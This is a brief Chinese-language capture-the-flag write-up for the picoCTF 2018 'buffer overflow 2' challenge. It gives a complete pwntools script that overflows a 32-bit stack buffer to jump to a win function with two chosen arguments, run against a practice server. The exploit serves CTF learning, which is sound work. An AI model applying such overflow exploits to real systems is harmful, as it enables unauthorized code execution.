picoctf_2018_buffer overflow 2
检查保护,且为32位
明显栈溢出
找到win函数可以打印flag
整合思路,栈溢出,向win函数传入参数并满足条件即可
from pwn import *
p=remote('node4.buuoj.cn',25086)
#context.terminal = ['tmux', 'splitw', '-h']
elf=ELF('./PicoCTF_2018_buffer_overflow_2')
win=0x080485CB
a1=0xDEADBEEF
a2=0xDEADC0DE
payload=b'a'*(0x6c+4)
payload+=p32(win)
payload+=b'a'*4
payload+=p32(a1)
payload+=p32(a2)
p.sendline(payload)
p.interactive()